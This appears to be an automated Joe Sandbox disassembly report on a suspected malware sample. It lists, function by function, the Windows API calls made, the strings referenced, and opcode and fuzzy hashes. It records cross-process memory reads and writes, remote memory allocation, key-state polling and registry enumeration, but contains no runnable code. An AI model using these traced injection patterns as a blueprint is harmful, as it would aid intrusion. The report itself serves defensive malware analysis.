                                              • Opcode ID: 31581649ae55e551075f2f8fffc59f58c7cc70e7086663b529a4b31d19f5cc1e
                                              • Instruction ID: 699535ed3d296fe035748afc470f184a48df4f1380d1c813515318470edb8451
                                              • Opcode Fuzzy Hash: 31581649ae55e551075f2f8fffc59f58c7cc70e7086663b529a4b31d19f5cc1e
                                              • Instruction Fuzzy Hash: 20016CB0901759BDE3008F5A8C85B52FFA8FF59354F00411BA15C47941C7F5A864CBE5
                                              APIs
                                                • Part of subcall function 00032111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0003214F
                                                • Part of subcall function 00032111: GetStockObject.GDI32(00000011), ref: 00032163
                                                • Part of subcall function 00032111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0003216D
                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 000B6A86
                                              • LoadLibraryW.KERNEL32(?), ref: 000B6A8D
                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 000B6AA2
                                              • DestroyWindow.USER32(?), ref: 000B6AAA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                              • String ID: SysAnimate32
                                              • API String ID: 4146253029-1011021900
                                              • Opcode ID: 762d23b3a66e09e7ed148577bb83c2210b8f6655c8416a40d2f021a245e19732
                                              • Instruction ID: c0a3b089feb902745f194ae0fbce396807ea674c7ee095d4032bccb2da7aacef
                                              • Opcode Fuzzy Hash: 762d23b3a66e09e7ed148577bb83c2210b8f6655c8416a40d2f021a245e19732
                                              • Instruction Fuzzy Hash: 09219A71200205AFEF608FA4DC80EFB77EDEF59324F148618FA51A2190D37ADC519B62
                                              APIs
                                              • CharUpperBuffW.USER32(?,?), ref: 00092318
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: BuffCharUpper
                                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                                              • API String ID: 3964851224-769500911
                                              • Opcode ID: c2807fec3c245dc47d5cb6a20062913acaff4a50d95217c6c77eb385cacfd23e
                                              • Instruction ID: 512bd8341b61881aef83b3be49f699816ed38bd703a82f193682af78f302e4e0
                                              • Opcode Fuzzy Hash: c2807fec3c245dc47d5cb6a20062913acaff4a50d95217c6c77eb385cacfd23e
                                              • Instruction Fuzzy Hash: 2D112D70900119EFCF40EFA4D9528EEB7B4FF16344F5084A9E815A7262EB366E0ADF50
                                              APIs
                                                • Part of subcall function 00041A36: _memmove.LIBCMT ref: 00041A77
                                                • Part of subcall function 000B147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000B040D,?,?), ref: 000B1491
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000B075D
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000B079C
                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 000B07E3
                                              • RegCloseKey.ADVAPI32(?,?), ref: 000B080F
                                              • RegCloseKey.ADVAPI32(00000000), ref: 000B081C
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                              • String ID:
                                              • API String ID: 3440857362-0
                                              • Opcode ID: 7892679dabc3c5610c75c98627fb638e77867de82690f2318af3a5b9ebf5f6fb
                                              • Instruction ID: 1fc5c97cd46f47c2132b150bda79fd8664c9ecfcd5b02aed17c5da73ee9abf13
                                              • Opcode Fuzzy Hash: 7892679dabc3c5610c75c98627fb638e77867de82690f2318af3a5b9ebf5f6fb
                                              • Instruction Fuzzy Hash: 78515871608204AFD714EF64C885FAFB7E9BF88304F14892DF596972A2DB30E945CB52
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bc7d5f4481d55cda888b74f155090ac5a58e4d2c05d9ad208551a4861ebc2e3e
                                              • Instruction ID: 2053bc3b4781213643542ce94d3efc6b2755d7d9adfeb27d42e81af46359c20d
                                              • Opcode Fuzzy Hash: bc7d5f4481d55cda888b74f155090ac5a58e4d2c05d9ad208551a4861ebc2e3e
                                              • Instruction Fuzzy Hash: 6941C375A4C214AFD760DB28CC88FEABBF8EB0B350F140165E91AA72D1CA749D41DA51
                                              APIs
                                              • GetCursorPos.USER32(?), ref: 00032727
                                              • ScreenToClient.USER32(000F77B0,?), ref: 00032744
                                              • GetAsyncKeyState.USER32(00000001), ref: 00032769
                                              • GetAsyncKeyState.USER32(00000002), ref: 00032777
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: AsyncState$ClientCursorScreen
                                              • String ID:
                                              • API String ID: 4210589936-0
                                              • Opcode ID: 432b700c179750f88204e0e7b362135e1d68bb0241d59ad70de22eee1f7a28c1
                                              • Instruction ID: 4963dcd8f286ddc43e8e6a26775d5affbdb1c137de7d261fe22faeefeb52aab8
                                              • Opcode Fuzzy Hash: 432b700c179750f88204e0e7b362135e1d68bb0241d59ad70de22eee1f7a28c1
                                              • Instruction Fuzzy Hash: 01415175508119FFDF169F68C848EEDBBB5FB05324F10831AF86496290CB35AE50DB91
                                              APIs
                                              • IsWindow.USER32(00000000), ref: 000A6159
                                              • GetForegroundWindow.USER32 ref: 000A6170
                                              • GetDC.USER32(00000000), ref: 000A61AC
                                              • GetPixel.GDI32(00000000,?,00000003), ref: 000A61B8
                                              • ReleaseDC.USER32(00000000,00000003), ref: 000A61F3
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Window$ForegroundPixelRelease
                                              • String ID:
                                              • API String ID: 4156661090-0
                                              • Opcode ID: cf68a1b234620e8c5c7363bf51933615d90ad59877fd45e4e84ed6fc53fa7e4d
                                              • Instruction ID: e4f1ffb12a4698a95436e52ed2cc6d4f7e117e8d728f82f10ae2587b4e821e44
                                              • Opcode Fuzzy Hash: cf68a1b234620e8c5c7363bf51933615d90ad59877fd45e4e84ed6fc53fa7e4d
                                              • Instruction Fuzzy Hash: CC219675A00204DFD714EFA5DD88E9ABBF9EF89311F048469F94A97362CA75AC00DB90
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: _memcmp
                                              • String ID:
                                              • API String ID: 2931989736-0
                                              • Opcode ID: 7013be005142e871e5c3b491c00f646cd102947e072a72c89c9e1304fd7a05a7
                                              • Instruction ID: 7c9920bd5ef93dc350a0a49b0eb1438117d3c7d14476737be9e4c42f687b9940
                                              • Opcode Fuzzy Hash: 7013be005142e871e5c3b491c00f646cd102947e072a72c89c9e1304fd7a05a7
                                              • Instruction Fuzzy Hash: 3E019272A84105BBF21477119C82FEF637CAB60395F048029FE469A642EB70EE1583F1
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 0009CA75
                                              • CoCreateInstance.OLE32(000C3D3C,00000000,00000001,000C3BAC,?), ref: 0009CA8D
                                                • Part of subcall function 00041A36: _memmove.LIBCMT ref: 00041A77
                                              • CoUninitialize.OLE32 ref: 0009CCFA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: CreateInitializeInstanceUninitialize_memmove
                                              • String ID: .lnk
                                              • API String ID: 2683427295-24824748
                                              • Opcode ID: eb04cc0094fc945a59bf279328642e2a3bbe02bfcf3dfea02b61b0c070e4ee7a
                                              • Instruction ID: ad757608a671db4ccb02f49557e17460c77d025c8658709998d30a4c827e22b0
                                              • Opcode Fuzzy Hash: eb04cc0094fc945a59bf279328642e2a3bbe02bfcf3dfea02b61b0c070e4ee7a
                                              • Instruction Fuzzy Hash: 7FA12AB1508205AFD301EF64D881EABB7ECEF95714F00492CF5559B292EB70EA49CB92
                                              APIs
                                                • Part of subcall function 00050FE6: std::exception::exception.LIBCMT ref: 0005101C
                                                • Part of subcall function 00050FE6: __CxxThrowException@8.LIBCMT ref: 00051031
                                                • Part of subcall function 00041A36: _memmove.LIBCMT ref: 00041A77
                                                • Part of subcall function 00041680: _memmove.LIBCMT ref: 000416DB
                                              • __swprintf.LIBCMT ref: 0003E598
                                              Strings
                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0003E431
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                              • API String ID: 1943609520-557222456
                                              • Opcode ID: 36d8c678b70021d7948e7a4fab2b2c77e3cb838e592fdf95b9b31ebc56f22013
                                              • Instruction ID: 1af45ab18dfcb5a408c9e4a59c9cb909f0c8c4d2fb08fbb1a9701ebc6f33cd58
                                              • Opcode Fuzzy Hash: 36d8c678b70021d7948e7a4fab2b2c77e3cb838e592fdf95b9b31ebc56f22013
                                              • Instruction Fuzzy Hash: B3917E715086419FC725EF24D896CEFB7E8AF95300F404A2DF885972A2EA70ED44CB56
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: #$+
                                              • API String ID: 0-2552117581
                                              • Opcode ID: 4a6e8357d11511aed7fd70a6fde11ce3758d8cbc52fea4788106ee99d77c9c08
                                              • Instruction ID: 887fa5e95b0c1832ac86029838febdf0af9d72e299cb5e83435e2858776df1ea
                                              • Opcode Fuzzy Hash: 4a6e8357d11511aed7fd70a6fde11ce3758d8cbc52fea4788106ee99d77c9c08
                                              • Instruction Fuzzy Hash: E0510175904259CFDB25AF68C880AFE7BA0FF59310F144065ECC59B291DB36AC86CB61
                                              APIs
                                                • Part of subcall function 00091CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00089E4E,?,?,00000034,00000800,?,00000034), ref: 00091CE5
                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0008A3F7
                                                • Part of subcall function 00091C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00089E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00091CB0
                                                • Part of subcall function 00091BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00091C08
                                                • Part of subcall function 00091BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00089E12,00000034,?,?,00001004,00000000,00000000), ref: 00091C18
                                                • Part of subcall function 00091BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00089E12,00000034,?,?,00001004,00000000,00000000), ref: 00091C2E
                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0008A464
                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0008A4B1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                              • String ID: @
                                              • API String ID: 4150878124-2766056989
                                              • Opcode ID: b06760844c70f09d33d5ebbf2afc837dcdcc5e8bbef3d7f7fba749791ce73b3c
                                              • Instruction ID: 206c66ea4b7ab9e59d0068b06fcd997f4658084392e175febcf7a2f86fc23ff4
                                              • Opcode Fuzzy Hash: b06760844c70f09d33d5ebbf2afc837dcdcc5e8bbef3d7f7fba749791ce73b3c
                                              • Instruction Fuzzy Hash: 84414CB2A4121DAFDF10DFA4CC86ADEBBB8EF45300F0041A5FA45B7181DA706E45DBA1
                                              APIs
                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 000B826F
                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 000B827D
                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 000B8284
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: MessageSend$DestroyWindow
                                              • String ID: msctls_updown32
                                              • API String ID: 4014797782-2298589950
                                              • Opcode ID: daa6aced49bef965110be6590f75c35e321ad2814863b91b3f4ff8c9b4bc15a6
                                              • Instruction ID: a19ff5e5d18996d289efed4a7f761c3a77003a99ae97523431798c3c4f663086
                                              • Opcode Fuzzy Hash: daa6aced49bef965110be6590f75c35e321ad2814863b91b3f4ff8c9b4bc15a6
                                              • Instruction Fuzzy Hash: 7A218CB1604208AFEB50DF58CC85DB737EDEF5A3A4B044159FA059B2A2CB71EC11DBA0
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,0007027A,?), ref: 000AC6E7
                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 000AC6F9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                              • API String ID: 2574300362-1816364905
                                              • Opcode ID: e42b08a477ac653fc3da9e82769e4a710984143ac137c0caeb257b11b389ec95
                                              • Instruction ID: 801e285c58e49af93869eb253ad1f972cb5a39b7988baa0bfa73d9e853d0de84
                                              • Opcode Fuzzy Hash: e42b08a477ac653fc3da9e82769e4a710984143ac137c0caeb257b11b389ec95
                                              • Instruction Fuzzy Hash: ECE08278204302CFEB208B6AC848F4AB6E8EF05314B80842EE889D2220E778CC80CB10
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00044B44,?,000449D4,?,?,000427AF,?,00000001), ref: 00044B85
                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00044B97
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                              • API String ID: 2574300362-3689287502
                                              • Opcode ID: 110c8bb7597111e2532a549e9c0afdc3eaca3601d6441a73c321ed78f6992fe2
                                              • Instruction ID: d8106b138bfcf47686dd12d28d1fb1916ebb349b4fefa6274c772c4cfe9583e2
                                              • Opcode Fuzzy Hash: 110c8bb7597111e2532a549e9c0afdc3eaca3601d6441a73c321ed78f6992fe2
                                              • Instruction Fuzzy Hash: 33D017B0510B12CFE7209F31EC18B0AB6E4EF04351F15883ED98AE6550E774E880CA54
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: LocalTime__swprintf
                                              • String ID: %.3d$WIN_XPe
                                              • API String ID: 2070861257-2409531811
                                              • Opcode ID: a9a1671f3c1cf144e39e924775b8849352a5e6503d683dbef2209525c6e4142e
                                              • Instruction ID: c6280a639d3b8a84e97cd51a3ad563338957a77d105046795f996f44794db445
                                              • Opcode Fuzzy Hash: a9a1671f3c1cf144e39e924775b8849352a5e6503d683dbef2209525c6e4142e
                                              • Instruction Fuzzy Hash: 6AD012B1C18209EAC7399B90CC44EFE737CAB04314F108152F50AA2040E7399758EA6A
                                              APIs
                                              • CharLowerBuffW.USER32(?,?), ref: 000AE7A7
                                              • CharLowerBuffW.USER32(?,?), ref: 000AE7EA
                                                • Part of subcall function 000ADE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 000ADEAE
                                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 000AE9EA
                                              • _memmove.LIBCMT ref: 000AE9FD
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: BuffCharLower$AllocVirtual_memmove
                                              • String ID:
                                              • API String ID: 3659485706-0
                                              • Opcode ID: f33e61fd880407fe0bac30e99fcd606974bc9459e1f784d89415796b016e6ed8
                                              • Instruction ID: fc328af4b38b64e12593947cbb4c431dda5f981921ceb5508cece0e8b189eb41
                                              • Opcode Fuzzy Hash: f33e61fd880407fe0bac30e99fcd606974bc9459e1f784d89415796b016e6ed8
                                              • Instruction Fuzzy Hash: 57C17A71A083419FC754DF68C4809AABBE4FF89714F04896EF8999B352D731E946CF82
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 000A87AD
                                              • CoUninitialize.OLE32 ref: 000A87B8
                                                • Part of subcall function 000BDF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,000A8A0E,?,00000000), ref: 000BDF71
                                              • VariantInit.OLEAUT32(?), ref: 000A87C3
                                              • VariantClear.OLEAUT32(?), ref: 000A8A94
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                              • String ID:
                                              • API String ID: 780911581-0
